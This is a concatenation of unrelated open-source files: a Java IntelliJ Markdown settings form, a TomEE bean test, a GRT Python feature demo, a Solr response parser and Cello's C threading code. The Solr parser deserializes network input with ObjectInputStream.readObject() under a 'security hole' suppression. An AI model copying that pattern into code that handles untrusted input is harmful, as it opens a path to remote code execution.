                JComponentSetter<CustomizableEditorTextField, String> textEditorSetter = (component, value) -> updateEditorTextFieldText(component, value);
                //noinspection unchecked
                return new Settable[] {
                        notrace("myHeadTopEnabled", component(myHeadTopEnabled, i::getHeadTopEnabled, i::setHeadTopEnabled)),
                        notrace("myHeadBottomEnabled", component(myHeadBottomEnabled, i::getHeadBottomEnabled, i::setHeadBottomEnabled)),
                        notrace("myBodyTopEnabled", component(myBodyTopEnabled, i::getBodyTopEnabled, i::setBodyTopEnabled)),
                        notrace("myBodyBottomEnabled", component(myBodyBottomEnabled, i::getBodyBottomEnabled, i::setBodyBottomEnabled)),
                        notrace("myAddDocTypeHtml", component(myAddDocTypeHtml, i::getAddDocTypeHtml, i::setAddDocTypeHtml)),
                        notrace("myAddPageHeader", component(myAddPageHeader, i::getAddPageHeader, i::setAddPageHeader)),
                        notrace("myAddAnchorLinks", component(myAddAnchorLinks, i::getAddAnchorLinks, i::setAddAnchorLinks)),
                        notrace("myAnchorLinksWrapText", component(myAnchorLinksWrapText, i::getAnchorLinksWrapText, i::setAnchorLinksWrapText)),
                        notrace("myImageUriSerials", component(myImageUriSerials, i::getImageUriSerials, i::setImageUriSerials)),
                        notrace("myNoParaTags", component(myNoParaTags, i::getNoParaTags, i::setNoParaTags)),
                        trace("myDefaultUrlTitle", component(myDefaultUrlTitle, i::getDefaultUrlTitle, i::setDefaultUrlTitle)),
                        // The provider combo needs custom logic: it round-trips
                        // through myHtmlProviderLastItem rather than the widget.
                        new Settable<ComboBox<HtmlGeneratorProvider.Info>>() {
                            @Override
                            public void reset() {
                                myHtmlProviderLastItem = i.getHtmlGeneratorProviderInfo();
                                myHtmlProvidersModel.setSelectedItem(myHtmlProviderLastItem);
                            }

                            @Override
                            public void apply() {
                                i.setHtmlGeneratorProviderInfo(myHtmlProviderLastItem);
                            }

                            @Override
                            public boolean isModified() {
                                return !Objects.equals(i.getHtmlGeneratorProviderInfo(), myHtmlProviderLastItem);
                            }

                            @Override
                            public ComboBox<HtmlGeneratorProvider.Info> getComponent() {
                                return myHtmlProviders;
                            }
                        },
                        notrace("myHeadTop", component(myHeadTop, textEditorGetter, textEditorSetter, i::getHeadTop, i::setHeadTop)),
                        notrace("myHeadBottom", component(myHeadBottom, textEditorGetter, textEditorSetter, i::getHeadBottom, i::setHeadBottom)),
                        notrace("myBodyTop", component(myBodyTop, textEditorGetter, textEditorSetter, i::getBodyTop, i::setBodyTop)),
                        notrace("myBodyBottom", component(myBodyBottom, textEditorGetter, textEditorSetter, i::getBodyBottom, i::setBodyBottom)),
                };
            }
        };
        myAllowPlainTextHtmlGenerator = allowPlainTextHtmlGenerator;
        myLastPanelProviderInfo = getPanelProviderInfo();
        myHtmlProvidersModel = getHtmlProvidersModel(getPanelProvider());
        myHtmlProviderLastItem = MdHtmlSettings.Companion.getDefaultSettings(myLastPanelProviderInfo).getHtmlGeneratorProviderInfo();
        onFormCreated();
    }

    // Called by the IntelliJ UI designer before the .form file is bound;
    // creates the custom-constructed widgets and wires their listeners.
    private void createUIComponents() {
        myUpdateListener = e -> updateFormOnReshow(false);
        myHeadTopEnabled = new JBCheckBox();
        myHeadBottomEnabled = new JBCheckBox();
        myBodyTopEnabled = new JBCheckBox();
        myBodyBottomEnabled = new JBCheckBox();
        myAddDocTypeHtml = new JBCheckBox();
        myNoParaTags = new JBCheckBox();

        myHeadTopEnabled.addActionListener(myUpdateListener);
        myHeadBottomEnabled.addActionListener(myUpdateListener);
        myBodyTopEnabled.addActionListener(myUpdateListener);
        myBodyBottomEnabled.addActionListener(myUpdateListener);
        myAddDocTypeHtml.addActionListener(myUpdateListener);
        myNoParaTags.addActionListener(myUpdateListener);

        CustomizableEditorTextField.EditorCustomizationListener editorCustomizationListener = new CustomizableEditorTextField.EditorCustomizationListener() {
            @Override
            public boolean editorCreated(@NotNull EditorEx editor, @Nullable Project project) {
                updateFormOnReshow(false);
                return true;
            }

            @Nullable
            @Override
            public EditorHighlighter getHighlighter(Project project, @NotNull FileType fileType, @NotNull EditorColorsScheme settings) {
                return null;
            }
        };

        myHeadTop = createCustomizableTextFieldEditor(editorCustomizationListener, "html");
        myHeadBottom = createCustomizableTextFieldEditor(editorCustomizationListener, "html");
        myBodyTop = createCustomizableTextFieldEditor(editorCustomizationListener, "html");
        myBodyBottom = createCustomizableTextFieldEditor(editorCustomizationListener, "html");

        checkBoxEditorMap = new HashMap<>();
        checkBoxEditorMap.put(myHeadTopEnabled, myHeadTop);
        checkBoxEditorMap.put(myHeadBottomEnabled, myHeadBottom);
        checkBoxEditorMap.put(myBodyTopEnabled, myBodyTop);
        checkBoxEditorMap.put(myBodyBottomEnabled, myBodyBottom);

        myHtmlProvidersModel = getHtmlProvidersModel(getPanelProvider());
        myHtmlProviders = new ComboBox<>(myHtmlProvidersModel);
        myHtmlProviders.addItemListener(e -> {
            final Object item = e.getItem();
            if (e.getStateChange() != ItemEvent.SELECTED || !(item instanceof HtmlGeneratorProvider.Info)) {
                return;
            }
            myHtmlProviderLastItem = (HtmlGeneratorProvider.Info) item;
            updateOptionalSettings();
        });

        myExtensionsPanel = getExtensionsPanel();
    }

    // Re-maps the current settings onto a new preview panel provider and
    // rebuilds the generator combo with only compatible entries.
    @Override
    protected void updatePanelProviderDependentComponents(@NotNull HtmlPanelProvider fromProvider, @NotNull HtmlPanelProvider toProvider, boolean isInitialShow) {
        MdHtmlSettings htmlSettings = new MdHtmlSettings();
        components.apply(htmlSettings);
        htmlSettings.changeToProvider(fromProvider.getINFO(), toProvider.getINFO());
        myLastPanelProviderInfo = toProvider.getINFO();
        components.reset(htmlSettings);
        myHtmlProviderLastItem = htmlSettings.getHtmlGeneratorProvider().getINFO();
        myHtmlProvidersModel = getHtmlProvidersModel(toProvider);
        myHtmlProviders.setModel(myHtmlProvidersModel);
        myHtmlProvidersModel.setSelectedItem(myHtmlProviderLastItem);
        myHtmlProviders.setSelectedItem(myHtmlProviderLastItem);
    }

    // Collapses disabled snippet editors (unless none or all are enabled, in
    // which case every editor keeps its natural size) and relayouts the panel.
    public void updateFormOnReshow(boolean isInitialShow) {
        if (checkBoxEditorMap == null) return;

        int enabledEditors = 0;
        for (JBCheckBox checkBox : checkBoxEditorMap.keySet()) {
            CustomizableEditorTextField editorTextField = checkBoxEditorMap.get(checkBox);
            MdSettableFormBase.updateEditorTextFieldEditable(editorTextField, checkBox.isSelected());
            if (checkBox.isSelected()) enabledEditors++;
        }

        Dimension unconstrainedSize = new Dimension(-1, -1);
        Dimension constrainedSize = new Dimension(-1, 0);
        for (JBCheckBox checkBox : checkBoxEditorMap.keySet()) {
            CustomizableEditorTextField editorTextField = checkBoxEditorMap.get(checkBox);
            Container parent = editorTextField.getParent();
            GridLayoutManager gridLayoutManager = (GridLayoutManager) parent.getParent().getLayout();
            GridConstraints constraints = gridLayoutManager.getConstraintsForComponent(parent);
            if (checkBox.isSelected() || enabledEditors == 0 || enabledEditors == 4) {
                parent.setPreferredSize(unconstrainedSize);
                parent.setMaximumSize(unconstrainedSize);
                constraints.setFill(GridConstraints.FILL_BOTH);
                constraints.setVSizePolicy(GridConstraints.SIZEPOLICY_CAN_GROW | GridConstraints.SIZEPOLICY_CAN_SHRINK);
            } else {
                // Collapse: pin height to 0 and stop the cell from growing.
                parent.setPreferredSize(constrainedSize);
                parent.setMaximumSize(constrainedSize);
                constraints.setFill(GridConstraints.FILL_HORIZONTAL);
                constraints.setAnchor(GridConstraints.ANCHOR_NORTH);
                constraints.setVSizePolicy(GridConstraints.SIZEPOLICY_FIXED);
            }
            gridLayoutManager.invalidateLayout(parent);
        }

        myMainPanel.invalidate();
    }

    @Override
    protected JPanel getMainFormPanel() {
        return myMainPanel;
    }

    // Enables/disables options that only some generator providers support.
    @Override
    public void updateOptionalSettings() {
        HtmlGeneratorProvider panelProvider = HtmlGeneratorProvider.Companion.getFromInfoOrDefault(myHtmlProviderLastItem);
        myAddPageHeader.setEnabled(panelProvider.isSupportedSetting(MdHtmlSettings.ADD_PAGE_HEADER));
        myAddDocTypeHtml.setEnabled(panelProvider.isSupportedSetting(MdHtmlSettings.ADD_DOC_TYPE_HTML));
        updateExtensionsOptionalSettings();
    }

    @NotNull
    private CollectionComboBoxModel<HtmlGeneratorProvider.Info> getHtmlProvidersModel(@NotNull HtmlPanelProvider panelProvider) {
        List<HtmlGeneratorProvider.Info> providersInfo = getCompatibleGeneratorProvidersInfo(panelProvider);
        return new CollectionComboBoxModel<>(providersInfo, providersInfo.get(0));
    }

    // Filters registered generator extensions down to those usable with the
    // given preview panel provider.
    @NotNull
    private List<HtmlGeneratorProvider.Info> getCompatibleGeneratorProvidersInfo(@NotNull HtmlPanelProvider panelProvider) {
        HtmlGeneratorProvider[] extensions = HtmlGeneratorProvider.Companion.getEP_NAME().getExtensions();
        return ContainerUtil.mapNotNull(extensions, provider -> {
            if (provider.getHAS_PARENT()) {
                // dedicated CSS to another provider, not for generic panel use
                return null;
            }
            if (provider.getINFO().getProviderId().equals(TextHtmlGeneratorProvider.INSTANCE.getID())) {
                // unmodified HTML generator, this is selected by preview type settings
                if (!myAllowPlainTextHtmlGenerator) return null;
            } else if (!provider.getCOMPATIBILITY().isForAvailable(panelProvider.getCOMPATIBILITY())) {
                // not compatible with current browser
                return null;
            }
            return provider.getINFO();
        });
    }

    @Override
    public void reset(@NotNull final MdRenderingProfileHolder settings) {
        components.reset(settings.getHtmlSettings());
        resetExtensions(settings);
        updateOptionalSettings();
        if (!myInitialShow) {
            // if already initialized then update, otherwise the first show will do it
            ApplicationManager.getApplication().invokeLater(() -> updateFormOnReshow(false), ModalityState.any());
        }
        if (myUpdateListener != null) myUpdateListener.actionPerformed(null);
    }

    @Override
    public void apply(@NotNull final MdRenderingProfileHolder settings) {
        components.apply(settings.getHtmlSettings());
        applyExtensions(settings);
    }

    @Override
    public boolean isModified(@NotNull final MdRenderingProfileHolder settings) {
        return components.isModified(settings.getHtmlSettings()) || isModifiedExtensions(settings);
    }

    @Override
    protected void disposeResources() {
        myHeadTop = null;
        myHeadBottom = null;
        myBodyTop = null;
        myBodyBottom = null;
    }
}
| 6,203 |
378 | <reponame>CristianDVN/tomee
/**
*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.openejb.core.stateful;
import org.apache.openejb.OpenEJB;
import org.apache.openejb.jee.EnterpriseBean;
import org.apache.openejb.jee.StatefulBean;
import org.apache.openejb.junit.ApplicationComposer;
import org.apache.openejb.testing.AppResource;
import org.apache.openejb.testing.Module;
import org.junit.Test;
import org.junit.runner.RunWith;
import javax.annotation.PostConstruct;
import javax.annotation.PreDestroy;
import javax.ejb.Remove;
import javax.ejb.TransactionAttribute;
import javax.ejb.TransactionAttributeType;
import javax.naming.Context;
import javax.naming.NamingException;
import javax.transaction.SystemException;
import static org.junit.Assert.assertTrue;
import static org.junit.Assert.fail;
/**
 * Verifies that {@code @PostConstruct} and {@code @PreDestroy} callbacks of a
 * stateful session bean run inside an active transaction when annotated with
 * {@code TransactionAttributeType.REQUIRES_NEW}.
 */
@RunWith(ApplicationComposer.class)
public class StatefulTransactionInCallbacksTest {

    /** Deploys a single local stateful bean into the composed application. */
    @Module
    public EnterpriseBean bean() {
        return new StatefulBean(TransactionBean.class).localBean();
    }

    @AppResource
    private Context ctx;

    /**
     * Looking the bean up triggers @PostConstruct; remove() triggers
     * @PreDestroy. The assertions live inside the callbacks themselves.
     */
    @Test
    public void create() throws NamingException {
        final TransactionBean bean = (TransactionBean) ctx.lookup("java:global/StatefulTransactionInCallbacksTest/bean/TransactionBean");
        // contruct was ok
        bean.remove();
        // destroy was ok
    }

    public static class TransactionBean {

        // Fails the test if no transaction is active during @PostConstruct.
        @PostConstruct
        @TransactionAttribute(TransactionAttributeType.REQUIRES_NEW)
        public void hasTxConstruct() {
            try {
                assertTrue(OpenEJB.getTransactionManager().getTransaction() != null);
            } catch (final SystemException e) {
                fail(e.getMessage());
            }
        }

        // Fails the test if no transaction is active during @PreDestroy.
        @PreDestroy
        @TransactionAttribute(TransactionAttributeType.REQUIRES_NEW)
        public void hasTxDestroy() {
            try {
                assertTrue(OpenEJB.getTransactionManager().getTransaction() != null);
            } catch (final SystemException e) {
                fail(e.getMessage());
            }
        }

        @Remove
        public void remove() {
            // no-op
        }
    }
}
| 1,063 |
818 | import GRT
import sys
import argparse
def main():
    """Demonstrate the GRT ZeroCrossingCounter feature-extraction module.

    Loads a recording of N-dimensional accelerometer data named on the
    command line, counts zero crossings over a sliding window for every
    sample, prints each raw sample next to the extracted feature vector,
    and finally round-trips the module settings through a file.

    See the original GRT ZeroCrossingCounter example for a plot of the
    recording this is meant to be run against.
    """
    # Read the data file name from the command line.
    cli = argparse.ArgumentParser(description='Process some data.')
    cli.add_argument('filename', help='A data file')
    options = cli.parse_args()

    # Load the example recording; bail out if it cannot be read.
    recording = GRT.ClassificationData()
    if not recording.load(options.filename):
        print("ERROR: Failed to load data from file!")
        sys.exit(1)

    # Parameters for the zero-crossing counter.
    window_size = 20
    dead_zone = 0.01
    dimensions = recording.getNumDimensions()
    # GRT.ZeroCrossingCounter.COMBINED_FEATURE_MODE would pool all axes
    # into a single count instead of one count per dimension.
    mode = GRT.ZeroCrossingCounter.INDEPENDANT_FEATURE_MODE

    counter = GRT.ZeroCrossingCounter(window_size, dead_zone, dimensions, mode)

    # Feed every sample through the counter and report input vs. features.
    for index in range(recording.getNumSamples()):
        sample = recording.get(index).getSample()
        counter.computeFeatures(sample)
        print("InputVector: " + str(sample))
        print("FeatureVector: " + str(counter.getFeatureVector()))

    # Persist the settings, then load them back to show the round trip.
    counter.save("MovementIndexSettings.grt")
    counter.load("MovementIndexSettings.grt")
if __name__ == '__main__':
    # Run the demo; exit status 0 on success (load failures inside main()
    # exit with status 1 before reaching this line).
    main()
    sys.exit(0)
585 | /*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.solr.analytics.stream;
import org.apache.lucene.util.SuppressForbidden;
import org.apache.solr.analytics.AnalyticsRequestManager;
import org.apache.solr.client.solrj.ResponseParser;
import org.apache.solr.common.SolrException;
import org.apache.solr.common.SolrException.ErrorCode;
import org.apache.solr.common.util.NamedList;
import org.apache.solr.handler.AnalyticsHandler;
import java.io.DataInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.ObjectInputStream;
import java.io.Reader;
/**
 * This parser initiates a merge of an Analytics Shard Response, sent from the {@link AnalyticsHandler}.
 *
 * The input stream is immediately sent to the given {@link AnalyticsRequestManager} to merge.
 *
 * Wire format: a leading boolean — {@code true} means shard data follows and
 * is streamed into the manager; {@code false} means a serialized Throwable
 * follows, which is returned to the caller under the "Exception" key.
 */
public class AnalyticsShardResponseParser extends ResponseParser {
    public static final String BINARY_CONTENT_TYPE = "application/octet-stream";
    // NOTE(review): same value as BINARY_CONTENT_TYPE and unreferenced here;
    // presumably kept for external callers — confirm before removing.
    public static final String STREAM = "application/octet-stream";
    private final AnalyticsRequestManager manager;

    /**
     *
     * @param manager the manager of the current Analytics Request, will manage the merging of shard data
     */
    public AnalyticsShardResponseParser(AnalyticsRequestManager manager) {
        this.manager = manager;
    }

    @Override
    public String getWriterType() {
        return "analytics_shard_stream";
    }

    /**
     * Streams shard data into the manager, or deserializes and returns the
     * shard's exception. The returned list is empty on success.
     *
     * SECURITY: ObjectInputStream.readObject() deserializes whatever the
     * shard sent — acceptable only because shards are trusted peers; hence
     * the @SuppressForbidden marker below.
     */
    @Override
    @SuppressForbidden(reason = "XXX: security hole")
    public NamedList<Object> processResponse(InputStream body, String encoding) {
        DataInputStream input = new DataInputStream(body);
        //check to see if the response is an exception
        NamedList<Object> exception = new NamedList<>();
        try {
            if (input.readBoolean()) {
                manager.importShardData(input);
            } else {
                exception.add("Exception", new ObjectInputStream(input).readObject());
            }
        } catch (IOException e) {
            exception.add("Exception", new SolrException(ErrorCode.SERVER_ERROR, "Couldn't process analytics shard response", e));
        } catch (ClassNotFoundException e1) {
            // Unknown class in the serialized exception payload; cause preserved.
            throw new RuntimeException(e1);
        }
        return exception;
    }

    @Override
    public String getContentType() {
        return BINARY_CONTENT_TYPE;
    }

    @Override
    public String getVersion() {
        return "1";
    }

    // Shard responses are binary-only; a character stream is a protocol error.
    @Override
    public NamedList<Object> processResponse(Reader reader) {
        throw new RuntimeException("Cannot handle character stream");
    }
}
| 925 |
4,067 | #include "Cello.h"
/* Doc accessor: class name shown in generated documentation. */
static const char* Current_Name(void) {
  return "Current";
}
/* Doc accessor: one-line summary of the Current class. */
static const char* Current_Brief(void) {
  return "Implicit Object";
}
/* Doc accessor: long-form description (markdown) of the Current class. */
static const char* Current_Description(void) {
  return
    "The `Current` class can be implemented by types which have implicit "
    "instances associated with them. For example it can be used to retrieve "
    "the _current_ `Thread`, or it could be used to get the _current_ Garbage "
    "Collector."
    "\n\n"
    "This class may be implemented by types which express the [Singleton "
    "Design Pattern](http://en.wikipedia.org/wiki/Singleton_pattern)";
}
/* Doc accessor: the C struct layout an implementor must provide. */
static const char* Current_Definition(void) {
  return
    "struct Current {\n"
    "  var (*current)(void);\n"
    "};\n";
}
/* Doc accessor: usage examples; the array is {NULL, NULL}-terminated. */
static struct Example* Current_Examples(void) {

  static struct Example examples[] = {
    {
      "Usage",
      "var gc = current(GC);\n"
      "show(gc);\n"
      "var thread = current(Thread);\n"
      "show(thread);\n"
    }, {NULL, NULL}
  };

  return examples;
}
static struct Method* Current_Methods(void) {
static struct Method methods[] = {
{
"current",
"var current(var type);",
"Returns the current active object of the given `type`."
}, {NULL, NULL, NULL}
};
return methods;
}
var Current = Cello(Current,
Instance(Doc,
Current_Name, Current_Brief, Current_Description,
Current_Definition, Current_Examples, Current_Methods));
var current(var type) {
return type_method(type, Current, current);
}
/* Internal state of a Cello Thread object. */
struct Thread {
  var func;        /* callable invoked on the new thread via call_with() */
  var args;        /* argument tuple copied at call() time; freed after the run */
  var tls;         /* per-thread storage: raw Table mapping String keys to Refs */
  bool is_main;    /* true only for the implicit main-thread wrapper */
  bool is_running; /* set once the OS thread has started executing */

#if defined(CELLO_UNIX)
  pthread_t thread;
#elif defined(CELLO_WINDOWS)
  DWORD id;        /* thread id filled in by CreateThread */
  HANDLE thread;
#endif

};
/* Doc trait implementations for Thread (name / summary / description /
 * examples shown in the generated documentation). */

static const char* Thread_Name(void) {
  return "Thread";
}

static const char* Thread_Brief(void) {
  return "Concurrent Execution";
}

static const char* Thread_Description(void) {
  return
    "The `Thread` type provides a basic primitive for concurrent "
    "execution. It acts as a basic wrapper around operating system threads, "
    "using WinThreads on Windows and pthreads otherwise.";
}

/* Example table; entries are {title, source} pairs ending in a NULL sentinel. */
static struct Example* Thread_Examples(void) {
  static struct Example examples[] = {
    {
      "Usage",
      "var set_value(var args) {\n"
      "  assign(get(args, $I(0)), $I(1));\n"
      "  return NULL;\n"
      "}\n"
      "\n"
      "var i = $I(0);\n"
      "\n"
      "var x = new(Thread, $(Function, set_value));\n"
      "call(x, i);\n"
      "join(x);\n"
      "\n"
      "show(i); /* 1 */\n"
    }, {
      "Exclusive Resource",
      "var increment(var args) {\n"
      "  var mut = get(args, $I(0));\n"
      "  var tot = get(args, $I(1));\n"
      "  lock(mut);\n"
      "  assign(tot, $I(c_int(tot)+1));\n"
      "  unlock(mut);\n"
      "  return NULL;\n"
      "}\n"
      "\n"
      "var mutex = new(Mutex);\n"
      "var total = $I(0);\n"
      "\n"
      "var threads = new(Array, Box,\n"
      "  new(Thread, $(Function, increment)),\n"
      "  new(Thread, $(Function, increment)),\n"
      "  new(Thread, $(Function, increment)));\n"
      "\n"
      "show(total); /* 0 */\n"
      "\n"
      "foreach (t in threads) {\n"
      "  call(deref(t), mutex, total);\n"
      "}\n"
      "\n"
      "foreach (t in threads) {\n"
      "  join(deref(t));\n"
      "}\n"
      "\n"
      "show(total); /* 3 */\n"
    }, {NULL, NULL}
  };
  return examples;
}
/* Constructor: the first constructor argument (optional) is the callable
 * to run; everything else starts empty. The TLS table is raw-allocated
 * (outside the GC) and owned by this object. */
static void Thread_New(var self, var args) {

  struct Thread* t = self;
  t->func = empty(args) ? NULL : get(args, $I(0));
  t->args = NULL;
  t->is_main = false;
  t->is_running = false;

  t->tls = new_raw(Table, String, Ref);

}

/* Destructor: releases the OS handle (Windows), any unconsumed argument
 * copy, and the TLS table.
 * NOTE(review): there is no join here -- deleting a still-running thread
 * looks unsafe; confirm callers always join first. */
static void Thread_Del(var self) {
  struct Thread* t = self;

#ifdef CELLO_WINDOWS
  CloseHandle(t->thread);
#endif

  /* args are normally freed by the thread body; this covers the case where
   * the thread was never actually run. */
  if (t->args isnt NULL) { del_raw(t->args); }
  del_raw(t->tls);
}
/* C_Int trait: expose the OS thread id as an integer.
 * Throws ValueError if the thread has not been started (no id exists yet). */
static int64_t Thread_C_Int(var self) {
  struct Thread* t = self;

  if (not t->is_running) {
    throw(ValueError, "Cannot get thread ID, thread not running!");
  }

#if defined(CELLO_UNIX)
  return (int64_t)t->thread;
#elif defined(CELLO_WINDOWS)
  return (int64_t)t->id;
#else
  return 0;
#endif

}

/* Assign trait: copy the callable and the thread-local storage from another
 * Thread. OS-level state (handle/id, running flags) is deliberately not
 * copied.
 * NOTE(review): alloc_raw(Table) allocates without running the Table
 * constructor, unlike the new_raw(Table, ...) used in Thread_New -- confirm
 * that assign() on an unconstructed table is safe here. */
static void Thread_Assign(var self, var obj) {
  struct Thread* t = self;
  struct Thread* o = cast(obj, Thread);
  t->func = o->func;
  t->tls = t->tls ? t->tls : alloc_raw(Table);
  assign(t->tls, o->tls);
}
/* Cmp trait: order threads by their numeric thread id.
 *
 * The previous implementation returned the int64 difference truncated to
 * int, which can wrap and report an incorrect ordering when the ids differ
 * by more than INT_MAX. Compare explicitly instead.
 * Both operands must be running threads (Thread_C_Int / c_int throw
 * otherwise), matching the original behavior and evaluation order. */
static int Thread_Cmp(var self, var obj) {
  int64_t a = Thread_C_Int(self);
  int64_t b = c_int(obj);
  return (a > b) - (a < b);
}
/* Hash trait: hash a thread by its id.
 * Throws (via Thread_C_Int) if the thread is not running. */
static uint64_t Thread_Hash(var self) {
  return Thread_C_Int(self);
}
/* One-time flag guarding creation of the process-wide TLS key. */
static bool Thread_TLS_Key_Created = false;

#if defined(CELLO_UNIX)

/* Key under which each OS thread stores its owning Cello Thread object. */
static pthread_key_t Thread_Key_Wrapper;

static void Thread_TLS_Key_Create(void) {
  pthread_key_create(&Thread_Key_Wrapper, NULL);
}

static void Thread_TLS_Key_Delete(void) {
  pthread_key_delete(Thread_Key_Wrapper);
}

/* Entry point executed on the new OS thread (pthread_create start routine).
 * Publishes the Thread object into TLS, sets up a per-thread GC and
 * exception stack, runs the user callable, then tears down in reverse. */
static var Thread_Init_Run(var self) {

  struct Thread* t = self;
  pthread_setspecific(Thread_Key_Wrapper, t);
  t->is_running = true;

#ifndef CELLO_NGC
  /* Address of a stack local marks the bottom of this thread's stack for
   * the garbage collector. */
  var bottom = NULL;
  var gc = new_raw(GC, $R(&bottom));
#endif
  var exc = new_raw(Exception);

  var x = call_with(t->func, t->args);
  /* The args copy made in Thread_Call is owned (and freed) by this thread. */
  del_raw(t->args);
  t->args = NULL;

  del_raw(exc);
#ifndef CELLO_NGC
  del_raw(gc);
#endif

  return x;
}
#elif defined(CELLO_WINDOWS)

/* TLS slot under which each OS thread stores its owning Thread object. */
static DWORD Thread_Key_Wrapper;

static void Thread_TLS_Key_Create(void) {
  Thread_Key_Wrapper = TlsAlloc();
}

static void Thread_TLS_Key_Delete(void) {
  TlsFree(Thread_Key_Wrapper);
}

/* Entry point executed on the new OS thread; cast to
 * LPTHREAD_START_ROUTINE at the CreateThread call site.
 * NOTE(review): lacks the WINAPI/__stdcall calling convention that
 * LPTHREAD_START_ROUTINE specifies -- benign on x64, but confirm for x86. */
static DWORD Thread_Init_Run(var self) {

  struct Thread* t = self;
  TlsSetValue(Thread_Key_Wrapper, t);
  t->is_running = true;
  var ex = new_raw(Exception);

#ifndef CELLO_NGC
  /* Stack-bottom marker for the per-thread garbage collector. */
  var bottom = NULL;
  var gc = new_raw(GC, $R(&bottom));
#endif

  call_with(t->func, t->args);
  /* The args copy made in Thread_Call is owned (and freed) by this thread. */
  del_raw(t->args);
  t->args = NULL;

#ifndef CELLO_NGC
  del_raw(gc);
#endif
  del_raw(ex);

  return 0;
}

#endif
/* Call trait: start the thread with the given arguments.
 * The argument tuple is deep-copied so the caller's (possibly stack
 * allocated) objects stay valid; the copy is freed by the new thread. */
static var Thread_Call(var self, var args) {

  struct Thread* t = self;
  t->args = assign(alloc_raw(type_of(args)), args);

  /* Call Init Thread & Run */
#if defined(CELLO_UNIX)

  /* Setup Thread Local Storage */
  if (not Thread_TLS_Key_Created) {
    Thread_TLS_Key_Create();
    Thread_TLS_Key_Created = true;
    atexit(Thread_TLS_Key_Delete);
  }

  /* Translate pthread_create error codes into Cello exceptions. */
  int err = pthread_create(&t->thread, NULL, Thread_Init_Run, t);

  if (err is EINVAL) {
    throw(ValueError, "Invalid Argument to Thread Creation");
  }

  if (err is EAGAIN) {
    throw(OutOfMemoryError, "Not enough resources to create another Thread");
  }

  if (err is EBUSY) {
    throw(BusyError, "System is too busy to create thread");
  }

#elif defined(CELLO_WINDOWS)

  /* Setup Thread Local Storage */
  if (not Thread_TLS_Key_Created) {
    Thread_TLS_Key_Create();
    Thread_TLS_Key_Created = true;
    atexit(Thread_TLS_Key_Delete);
  }

  t->thread = CreateThread(NULL, 0,
    (LPTHREAD_START_ROUTINE)Thread_Init_Run, t, 0, &t->id);

  if (t->thread is NULL) {
    throw(ValueError, "Unable to Create WinThread");
  }

#else

  throw(ResourceError, "Unsupported Threading Environment");

#endif

  return self;

}
/* Lazily-created wrapper objects for the main thread; freed at exit. */
static var Thread_Main = NULL;
static var Exception_Main = NULL;

static void Thread_Main_Del(void) {
  del_raw(Exception_Main);
  del_raw(Thread_Main);
}

/* Current trait: return the Thread object for the calling OS thread.
 * Threads started via Thread_Call are found in TLS; any other caller
 * (including the main thread) gets the lazily-created main wrapper. */
static var Thread_Current(void) {

  if (not Thread_TLS_Key_Created) {
    Thread_TLS_Key_Create();
    Thread_TLS_Key_Created = true;
    atexit(Thread_TLS_Key_Delete);
  }

#if defined(CELLO_UNIX)
  var wrapper = pthread_getspecific(Thread_Key_Wrapper);
#elif defined(CELLO_WINDOWS)
  var wrapper = TlsGetValue(Thread_Key_Wrapper);
#else
  var wrapper = NULL;
#endif

  /*
  ** Here is a nasty one. On OSX instead of
  ** returning NULL for an unset key it
  ** decides to return uninitialized rubbish
  ** (even though the spec says otherwise).
  **
  ** Luckily we can test directly for the main
  ** thread on OSX using this non-portable method
  */
#ifdef CELLO_MAC
  if (pthread_main_np()) { wrapper = NULL; }
#endif

  if (wrapper is NULL) {
    if (Thread_Main is NULL) {
      Thread_Main = new_raw(Thread);
      Exception_Main = new_raw(Exception);
      atexit(Thread_Main_Del);
    }
    struct Thread* t = Thread_Main;
    t->is_main = true;
    t->is_running = true;
#if defined(CELLO_UNIX)
    t->thread = pthread_self();
#elif defined(CELLO_WINDOWS)
    /* NOTE(review): GetCurrentThread() returns a pseudo-handle only valid
     * on the calling thread -- confirm it is never used cross-thread. */
    t->thread = GetCurrentThread();
#endif
    return Thread_Main;
  }

  return wrapper;

}
/* Start trait: starting a thread is just calling it with no arguments. */
static void Thread_Start(var self) {
  call(self);
}

/* Stop trait: interrupt the thread.
 * NOTE(review): on UNIX this delivers SIGINT via pthread_kill -- unless a
 * handler is installed, the default disposition terminates the whole
 * process, not just this thread; confirm intended. TerminateThread on
 * Windows is similarly abrupt (held locks are not released). */
static void Thread_Stop(var self) {
  struct Thread* t = self;

#if defined(CELLO_UNIX)
  if (not t->thread) { return; }
  int err = pthread_kill(t->thread, SIGINT);
  if (err is EINVAL) { throw(ValueError, "Invalid Argument to Thread Stop"); }
  if (err is ESRCH)  { throw(ValueError, "Invalid Thread"); }
#elif defined(CELLO_WINDOWS)
  if (not t->thread) { return; }
  TerminateThread(t->thread, FALSE);
#endif

}

/* Join trait: block until the thread finishes. No-op if never started. */
static void Thread_Join(var self) {
  struct Thread* t = self;

#if defined(CELLO_UNIX)
  if (not t->thread) { return; }
  int err = pthread_join(t->thread, NULL);
  if (err is EINVAL) { throw(ValueError, "Invalid Argument to Thread Join"); }
  if (err is ESRCH)  { throw(ValueError, "Invalid Thread"); }
#elif defined(CELLO_WINDOWS)
  if (not t->thread) { return; }
  WaitForSingleObject(t->thread, INFINITE);
#endif

}

/* Running trait: true once the thread body has begun executing. */
static bool Thread_Running(var self) {
  struct Thread* t = self;
  return t->is_running;
}
/* Get trait: thread-local storage lookup. Values are stored as Refs, so
 * lookups deref before returning. */
static var Thread_Get(var self, var key) {
  struct Thread* t = self;
